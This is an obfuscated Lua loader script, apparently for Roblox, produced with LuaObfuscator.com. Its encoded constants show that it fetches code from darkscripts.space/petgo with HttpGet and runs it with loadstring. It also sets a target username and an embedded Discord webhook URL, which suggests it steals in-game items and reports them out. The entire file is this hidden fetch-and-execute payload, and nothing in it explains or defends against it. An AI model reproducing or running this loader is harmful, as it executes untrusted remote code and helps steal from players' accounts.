--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v91=0;local v92;while true do if (v91==1) then return v92;end if (v91==0) then v92=v5(v82,v19);v19=nil;v91=1;end end else return v82;end end end);local function v20(v31,v32,v33) if v33 then local v83=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -(1 + 0))) -(v32-(620 -(555 + (941 -(282 + 595)))))) + (932 -(857 + 74)))) ;return v83-(v83%(569 -(367 + 201))) ;else local v84=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v84 + v84))>=v84) and 1) or 0 ;end end local function v21() local v34=0;local v35;while true do if (v34==1) then return v35;end if (v34==(1637 -(1523 + 114))) then v35=v1(v16,v18,v18);v18=v18 + (118 -(32 + 85)) + 0 ;v34=1 -(0 + 0) ;end end end local function v22() local v36=0 + 0 ;local v37;local v38;while true do if (v36==((1138 -(67 + 113)) -(892 + 65))) then return (v38 * (610 -(260 + 94))) + v37 ;end if (v36==0) then v37,v38=v1(v16,v18,v18 + (3 -1) );v18=v18 + (3 -1) ;v36=351 -(87 + 263) ;end end end local function v23() local v39,v40,v41,v42=v1(v16,v18,v18 + (11 -8) );v18=v18 + (956 -(802 + 150)) ;return (v42 * (41190819 -24413603)) + (v41 * (48199 + 17337)) + (v40 * (187 + (1066 -(915 + 82)))) + v39 ;end local function v24() local v43=(0 + 0) -0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if ((2 + 0)==v43) then v48=v20(v45,13 + 8 ,31);v49=((v20(v45,41 -9 )==(1188 -(1069 + 118))) and  -(2 -1)) or (1 -0) ;v43=1 + 2 ;end if (v43==((4 + 0) -(1056 -(87 + 968)))) then if (v48==(0 + 0)) then if (v47==(791 -(368 + (1861 -1438)))) then return v49 * (0 -0) ;else v48=886 -(261 + 624) ;v46=18 -(10 + 8) ;end elseif (v48==(7874 -5827)) then return ((v47==0) and (v49 * (1/(442 -(416 + 26))))) or (v49 * NaN) ;end return v8(v49,v48-(2446 -(630 + 793)) ) * (v46 + (v47/(((6 + 0) -4)^(23 + 29)))) ;end if (v43==((0 -0) -0)) then v44=v23();v45=v23();v43=1;end if (v43==(439 -(145 + 293))) then v46=1748 -(760 + 987) ;v47=(v20(v45,(1844 -(447 + 966)) -(44 + 386) ,1506 -((2732 -1734) + 488) ) * ((1 + 1)^(87 -55))) + v44 ;v43=7 -5 ;end end end local function v25(v50) local v51=1817 -(1703 + 114) ;local v52;local v53;while true do if ((703 -(376 + 325))==v51) then v53={};for v93=1 -(0 + 0) , #v52 do v53[v93]=v2(v1(v3(v52,v93,v93)));end v51=8 -5 ;end if ((1 + 2)==v51) then return v6(v53);end if (v51==(1181 -(1123 + 57))) then v52=v3(v16,v18,(v18 + v50) -1 );v18=v18 + v50 ;v51=4 -2 ;end if (v51==(14 -(9 + 5))) then v52=nil;if  not v50 then local v103=(306 + 70) -(85 + 291) ;while true do if (v103==0) then v50=v23();if (v50==(1265 -(243 + 1022))) then return "";end break;end end end v51=3 -2 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return 736 -(223 + 513) ;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();local v60=(function() return;end)();local v61=(function() return;end)();while true do if (v54~=1) then else local v88=(function() return 0 + 0 ;end)();while true do if (0~=v88) then else v59=(function() return {v56,v57,nil,v58};end)();v60=(function() return v23();end)();v88=(function() return 1;end)();end if (v88~=(1502 -(1408 + 92))) then else v54=(function() return 2 -0 ;end)();break;end if (v88~=(1087 -(461 + 625))) then else v61=(function() return {};end)();for v104= #"|",v60 do local v105=(function() return 1288 -(993 + 295) ;end)();local v106=(function() return;end)();local v107=(function() return;end)();local v108=(function() return;end)();while true do if (v105~=(1 + 0)) then else v108=(function() return nil;end)();while true do if (v106~=(0 + 0)) then else v107=(function() return v21();end)();v108=(function() return nil;end)();v106=(function() return 1172 -(418 + 753) ;end)();end if (v106==(1637 -(1373 + 263))) then if (v107== #"|") then v108=(function() return v21()~=(1000 -(451 + 549)) ;end)();elseif (v107==(1 + 1)) then v108=(function() return v24();end)();elseif (v107== #"91(") then v108=(function() return v25();end)();end v61[v104]=(function() return v108;end)();break;end end break;end if (v105~=(0 + 0)) then else v106=(function() return 0 -0 ;end)();v107=(function() return nil;end)();v105=(function() return 1;end)();end end end v88=(function() return 531 -(406 + 123) ;end)();end end end if (v54~=(2 -0)) then else v59[ #"91("]=(function() return v21();end)();for v95= #"]",v23() do local v96=(function() return 1384 -(746 + 638) ;end)();local v97=(function() return;end)();while true do if ((0 + 0)~=v96) then else v97=(function() return v21();end)();if (v20(v97, #"|", #",")==0) then local v114=(function() return 0 + 0 ;end)();local v115=(function() return;end)();local v116=(function() return;end)();local v117=(function() return;end)();while true do if (0~=v114) then else local v143=(function() return 1322 -(1249 + 73) ;end)();while true do if (v143==(1 + 0)) then v114=(function() return 1;end)();break;end if (v143==(0 -0)) then local v173=(function() return 0;end)();while true do if (v173==1) then v143=(function() return 342 -(218 + 123) ;end)();break;end if (v173~=(1581 -(1535 + 46))) then else v115=(function() return v20(v97,2 + 0 , #"xnx");end)();v116=(function() return v20(v97, #"0313",1906 -(106 + 1794) );end)();v173=(function() return 1 + 0 ;end)();end end end end end if ((561 -(306 + 254))==v114) then local v144=(function() return 0 + 0 ;end)();while true do if ((1 + 0)==v144) then v114=(function() return 5 -3 ;end)();break;end if (v144==(0 -0)) then v117=(function() return {v22(),v22(),nil,nil};end)();if (v115==(0 -0)) then local v179=(function() return 0 + 0 ;end)();local v180=(function() return;end)();while true do if (v179==(114 -(4 + 110))) then v180=(function() return 584 -(57 + 527) ;end)();while true do if (v180~=0) then else v117[ #"asd"]=(function() return v22();end)();v117[ #"0836"]=(function() return v22();end)();break;end end break;end end elseif (v115== #"|") then v117[ #"gha"]=(function() return v23();end)();elseif (v115==(4 -2)) then v117[ #"xnx"]=(function() return v23() -((605 -(268 + 335))^(306 -(60 + 230))) ;end)();elseif (v115== #"nil") then local v187=(function() return 572 -(426 + 146) ;end)();local v188=(function() return;end)();while true do if (v187==(0 + 0)) then v188=(function() return 0 -0 ;end)();while true do if (v188==(0 -0)) then v117[ #"xnx"]=(function() return v23() -((168 -(122 + 44))^16) ;end)();v117[ #"http"]=(function() return v22();end)();break;end end break;end end end v144=(function() return 1;end)();end end end if (v114==(1458 -(282 + 1174))) then if (v20(v116, #":", #"]")~= #"}") then else v117[813 -(569 + 242) ]=(function() return v61[v117[5 -3 ]];end)();end if (v20(v116,6 -4 ,1 + 1 )== #":") then v117[ #"xxx"]=(function() return v61[v117[ #"gha"]];end)();end v114=(function() return 1027 -(706 + 318) ;end)();end if (v114==(1254 -(721 + 530))) then if (v20(v116, #"gha", #"-19")~= #"]") then else v117[ #".com"]=(function() return v61[v117[ #".dev"]];end)();end v56[v95]=(function() return v117;end)();break;end end end break;end end end for v98= #"/",v23() do v57,v98,v28=(function() return v55(v57,v98,v28);end)();end return v59;end if (v54~=(0 -0)) then else local v90=(function() return 0;end)();while true do if (v90~=2) then else v54=(function() return 1272 -(945 + 326) ;end)();break;end if ((0 + 0)==v90) then v55=(function() return function(v109,v110,v111) local v112=(function() return 1257 -(1043 + 214) ;end)();local v113=(function() return;end)();while true do if (v112==0) then v113=(function() return 0 -0 ;end)();while true do if (v113==(1212 -(323 + 889))) then v109[v110-#"." ]=(function() return v111();end)();return v109,v110,v111;end end break;end end end;end)();v56=(function() return {};end)();v90=(function() return 2 -1 ;end)();end if ((1 + 0)==v90) then v57=(function() return {};end)();v58=(function() return {};end)();v90=(function() return 702 -(271 + 429) ;end)();end end end end end local function v29(v62,v63,v64) local v65=v62[(1088 -507) -(361 + (586 -367)) ];local v66=v62[322 -(41 + 12 + 267) ];local v67=v62[1 + 2 ];return function(...) local v68=v65;local v69=v66;local v70=v67;local v71=v27;local v72=1;local v73= -(414 -(15 + 398));local v74={};local v75={...};local v76=v12("#",...) -(983 -(18 + 964)) ;local v77={};local v78={};for v85=0 -0 ,v76 do if (v85>=v70) then v74[v85-v70 ]=v75[v85 + 1 ];else v78[v85]=v75[v85 + (1126 -(936 + 189)) + 0 ];end end local v79=(v76-v70) + 1 + 0 ;local v80;local v81;while true do v80=v68[v72];v81=v80[851 -(20 + 830) ];if (v81<=9) then if ((v81<=(4 + 0 + 0)) or (3260<2355)) then if (v81<=(127 -(116 + (1237 -(322 + 905))))) then if (v81==(0 + 0)) then v78[v80[2]]=v80[741 -(542 + 196) ];else local v120=v80[3 -(1614 -(1565 + 48)) ];local v121=v78[v80[1 + 2 ]];v78[v120 + 1 ]=v121;v78[v120]=v121[v80[3 + 1 ]];end elseif ((v81<=((612 -(602 + 9)) + 1)) or (669==4223)) then v78[v80[4 -2 ]]=v64[v80[(1196 -(449 + 740)) -4 ]];elseif (v81>3) then local v146=0;local v147;while true do if (v146==(1551 -(1126 + 425))) then v147=v80[(252 + 155) -(118 + 287) ];v78[v147]=v78[v147](v13(v78,v147 + 1 ,v73));break;end end else local v148=0 -0 ;local v149;local v150;local v151;local v152;while true do if (v148==((2260 -(782 + 356)) -(118 + 1003))) then v73=(v151 + v149) -1 ;v152=0 -0 ;v148=379 -(142 + (502 -(176 + 91))) ;end if ((v148==(0 -0)) or (1692<588)) then v149=v80[1 + 1 ];v150,v151=v71(v78[v149](v13(v78,v149 + (978 -(553 + 424)) ,v80[5 -(4 -2) ])));v148=1 + 0 ;end if (v148==(2 + 0)) then for v177=v149,v73 do local v178=0 + 0 ;while true do if (v178==(0 + 0)) then v152=v152 + 1 + 0 ;v78[v177]=v150[v152];break;end end end break;end end end elseif (v81<=((959 -(245 + 702)) -6)) then if (v81==(13 -8)) then v64[v80[6 -3 ]]=v78[v80[1 + 1 ]];else local v129=0 -0 ;local v130;local v131;while true do if (v129==(754 -(239 + 514))) then v78[v130 + 1 ]=v131;v78[v130]=v131[v80[4]];break;end if ((v129==(0 + 0)) or (4797<3651)) then v130=v80[(1961 -630) -(797 + 532) ];v131=v78[v80[3 + 0 ]];v129=1 + 0 ;end end end elseif (v81<=(16 -9)) then do return;end elseif (v81==(1210 -(373 + 829))) then if (v78[v80[(2315 -1582) -((1568 -(975 + 117)) + 255) ]]==v80[1134 -(369 + 761) ]) then v72=v72 + 1 + 0 ;else v72=v80[5 -(1877 -(157 + 1718)) ];end else local v153=v80[3 -1 ];v78[v153]=v78[v153](v13(v78,v153 + 1 + 0 ,v73));end elseif (v81<=(252 -(64 + 174))) then if (v81<=(2 + 9)) then if ((v81==10) or (4177>4850)) then v78[v80[(1900 -(260 + 1638)) -(0 + 0) ]]();else v78[v80[338 -(144 + 192) ]]=v80[3];end elseif ((v81<=(228 -((148 -106) + (614 -(382 + 58))))) or (400>1111)) then v64[v80[3]]=v78[v80[2 + 0 ]];elseif (v81==((35 -24) + 2)) then if (v78[v80[1 + 1 ]]==v80[1508 -(363 + 1141) ]) then v72=v72 + (1581 -((4044 -2861) + 397)) ;else v72=v80[3];end else v78[v80[5 -3 ]]=v64[v80[3 + 0 ]];end elseif ((3051>1005) and (v81<=(12 + 4))) then if (v81==(1033 -(697 + 321))) then local v136=1975 -(1590 + 323 + 62) ;local v137;local v138;local v139;local v140;while true do if ((3693<=4382) and (v136==(2 + 0))) then for v170=v137,v73 do v140=v140 + (1 -0) ;v78[v170]=v138[v140];end break;end if ((v136==(0 -0)) or (3282>4100)) then v137=v80[1935 -(565 + 1368) ];v138,v139=v71(v78[v137](v13(v78,v137 + ((8 -5) -2) ,v80[3])));v136=(2867 -(902 + 303)) -(1477 + 184) ;end if ((v136==(1 -0)) or (3580<2844)) then v73=(v139 + v137) -1 ;v140=0 + 0 ;v136=(2337 -1479) -(564 + 292) ;end end else v72=v80[4 -(1 -0) ];end elseif (v81<=(51 -34)) then v72=v80[307 -(244 + 60) ];elseif ((89<4490) and (v81>(14 + (8 -4)))) then do return;end else v78[v80[478 -(41 + 435) ]]();end v72=v72 + ((391 + 611) -(938 + 63)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3Q00028Q00026Q00F03F030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574031F3Q00682Q7470733A2Q2F6461726B736372697074732E73706163652F706574676F03083Q00557365726E616D65030B3Q00436F796C6973745F31353803073Q00576562682Q6F6B03793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F3132393739373233353835343Q37313431322F5F6951785F546673776862794A485A557051525A4F2D5A553170746854767A6F54567268624E2D634D32693151306F2D706F41462Q6652534836653443467539424E5773001C3Q00124Q00013Q00260D3Q000B000100020004103Q000B0001001202000100033Q001202000200043Q00200100020002000500122Q000400064Q000F000200044Q000400013Q00022Q00120001000100010004103Q001B000100260D3Q0001000100010004103Q0001000100122Q000100013Q00260D00010015000100010004103Q0015000100122Q000200083Q00120C000200073Q00122Q0002000A3Q00120C000200093Q00122Q000100023Q00260D0001000E000100020004103Q000E000100124Q00023Q0004103Q000100010004103Q000E00010004103Q000100012Q00073Q00017Q00",v9(),...);
